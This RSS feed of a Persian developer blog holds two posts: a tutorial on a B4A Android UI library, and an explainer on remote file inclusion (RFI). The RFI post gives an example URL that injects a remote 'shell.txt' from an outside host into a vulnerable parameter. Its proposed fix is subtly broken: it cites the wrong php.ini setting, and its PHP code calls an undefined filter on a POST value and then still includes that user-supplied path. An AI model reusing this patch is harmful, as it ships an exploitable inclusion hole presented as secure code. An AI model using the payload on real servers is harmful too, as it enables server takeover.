<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
    <channel>
        <title>نوشته های crazy8</title>
        <link>https://virgool.io/feed/@crazy8</link>
        <description>برنامه نویس و علاقه مند به حوزه امنیت و تست نفوذ</description>
        <language>fa</language>
        <pubDate>2026-06-10 12:50:19</pubDate>
        <image>
            <url>https://files.virgool.io/upload/users/182814/avatar/XjmjYr.png?height=120&amp;width=120</url>
            <title>crazy8</title>
            <link>https://virgool.io/@crazy8</link>
        </image>

                    <item>
                <title>طراحی متریال با c8_design در b4a</title>
                <link>https://virgool.io/@crazy8/%D8%B7%D8%B1%D8%A7%D8%AD%DB%8C-%D9%85%D8%AA%D8%B1%DB%8C%D8%A7%D9%84-%D8%AF%D8%B1-b4a-%D9%BE%D8%A7%D8%B1%D8%AA-%D8%A7%D9%88%D9%84-o8qunrrcfd6c</link>
                <description>با سلام خدمت شما دوستان عزیز در این آموزش یاد می‌گیرید که چطور در محیط b4a ( بیسیک فور اندروید ) ویو هاتون رو شخصی سازی کنید و از دیزاین ضعیف b4a خداحافظی کنیدبیسیک فور اندروید چیست ؟بیسیک فور اندروید یک زبان خیلی خوب جهت توسعه برنامه اندرویدی است هرچند که الان با نام b4x شناخته می‌شود و کراس پلتفرم است!یعنی شما از بیسیک می‌توانید برنامه هایی برای ios , android یا ... بسازید و توسعه بدهید!بیسیک فور اندروید از نظر حجم خروجی و پرفورمنس خیلی مناسب است.شروع کار ...برای شروع کار ide بیسیک فور اندروید را باز کنید و در بخش لایبری روی یکی از کتابخانه ها راست کلیک و گزینه open internal libraries folder انتخاب کنید.آموزش نصب و راه اندازی b4a کلیک کنیداضافه کردن کتابخانهحال در پنجره باز شده کتابخانه c8_design را اضافه کنید.اکنون باید کتابخانه ی c8_design را تیک بزنیداستفاده از کتابخانهحال باید در محیط کد نویسی در ساب global متغیری از نوع کتابخانه بسازیمتعریف متغیر از نوع c8_designالان باید در ساب activity_create لایبری را با اسم جدیدی که برای آن تعریف کردیم باید راه اندازی کنیم.راه اندازی لایبریو حالا می‌توانیم از این کتابخانه برای شخصی سازی و طراحی بهتر استفاده کنیمتنظیم رنگ و اندازه بین خطوط در لیست ویو :a.Colorbetweenlines(Listview1,Colors.Red,0.2%y)تنظیم رنگ نویگیشن بار : a.NavigationBarColor(Colors.Red)تنظیم رنگ استیتس بار :a.StatusBarColor(Colors.Red)حذف سایه اپ بار :a.RemoveActionBarShadowشخصی سازی toastmessage :a.ToastMessagecustomize(50%x,50%y,&amp;quottest&amp;quot,False)افزودن سایه به متن :a.TextShadow(Label1,10,10,10,Colors.Red)شخصی سازی میله اسکرول بار :a.ScrollbarColor(scrollview1,Colors.Blue,5,Colors.Red)شخصی سازی ردیو باتن (radio button ) :a.RadioButtonColor(radiobutton1,Colors.Red,10,Colors.Black,Colors.Black,10)تمام ورودی ها قابل تغییر هستند.موفق و پیروز باشید!</description>
                <category>crazy8</category>
                <author>crazy8</author>
                <pubDate>Mon, 08 Jun 2020 16:04:40 +0430</pubDate>
            </item>
                    <item>
                <title>چرا حفره امنیتی rfi خطرناک است؟</title>
                <link>https://virgool.io/@crazy8/%DA%86%D8%B1%D8%A7-%D8%AD%D9%81%D8%B1%D9%87-%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C-rfi-%D8%AE%D8%B7%D8%B1%D9%86%D8%A7%DA%A9-%D8%A7%D8%B3%D8%AA-icmcfusw1xtm</link>
                <description>آموزش باگ rfiبا سلام خدمت دوستان عزیز بنده crazy8 هستم و درخدمتتون هستم با آموزش باگ rfi .با توجه به اینکه میتوان در وب اپلیکیشن ها باگ های مختلفی را مشاهده کرد در نتیجه بد نیست تا با این باگ ها آشنایی پیدا کنیم چرا که ممکن است همین باگ یا حفره امنیتی در وب سایت ما وجود داشته باشدخب دوستان بنده یک توضیح مختصری درمورد خود باگ در خدمتتون عرض میکنم که متوجه بشید اصلا باگ در وب اپلیکیشن ها یا ... چیست!باگ ها یا خطا ها یا اصطلاحا حفره های امنیتی بسیار خطرناک هستند و توسط اشتباه برنامه نویس ها به وجود می آیند در واقع وقتی یک باگ به وجود می آید که در سورس آن وب سایت یا ... از قطعه کد های منسوخ شده یا متد های نا امن استفاده شود و یا حتی برنامه نویس آشنایی با پچ باگ ها نداشته باشد و منجر به ایجاد یک باگ خطرناک شود.حال بریم سراغ اینکه باگ rfi چیست!باگ rfi نیز مانند باگ های دیگر در سطح وب اپلیکیشن ها بسیار خطرناک است ، نام این باگ مخفف remote file inclusion هست و فرد مهاجم با سواستفاده از این باگ میتواند شل اسکریپت خود را داخل سرور سایت مستقیما اجرا کند و دسترسی نسبتا کاملی را از سرور هدف دریافت کند و بتواند عمل مخربانه خود را انجام دهدباگ rfi باگی است که حتما باید به آن دقت داشته باشید و حتما چک کنید که سایت شما از این باگ برخوردار نباشد و در سایتتان باید از فایروال های قدرتمند استفاده کنید و همچنین ورودی های سایت را کنترل کنید چون روش ورود و شنود از طریق باگ rfi توسط ورودی های سایت انجام میشودبه طور مثال ورودی سایت شما به شکل زیر میباشدhttps://mr-crazy8.tk/test.php?m=19حال اگر ورودی سایت شما دارای این باگ باشد فرد هکر مسیر شل اسکریپت خود را در ورودی موجود جایگزین میکند و شل اسکریپت اجرا و دسترسی نسبتا کاملی را به فرد هکر میدهدمثال :https://mr-crazy8.tk/test.php?m=https://test.com/shell.txtپچ باگ rfiخب دوستان برای پچ باگ rfi میتوانید در ورودی ها فیلتر هایی رو بزارید و یا فایل php.ini را ادیت کنید و کد زیر را اضافه یا ویرایش کنید :allow_url_fopen = offالبته که ممکن است این قطعه کد چندان تاثیری نداشته باشد و قابل دور زدن است اما باز هم ممکن است موثر باشدقطعه کد دیگری که میتواند موثر باشد :html :

&lt;a href=index.php?page=file1.php&gt;Crazy8&lt;/a&gt;

php :

&lt;?php
$page = cleanAll($_POST[page]);
include($page);
?&gt;در قطعه کد بالا ما فیلتر هایی را برای ورودی اعمال کردیم و یک کد موثر تر به سرور جهت پردازش تحویل میدهیمبرای ارتباط با من  در تلگرام  کلیک کنید.موفق و پیروز باشید!</description>
                <category>crazy8</category>
                <author>crazy8</author>
                <pubDate>Wed, 29 Apr 2020 12:17:01 +0430</pubDate>
            </item>
            </channel>
</rss>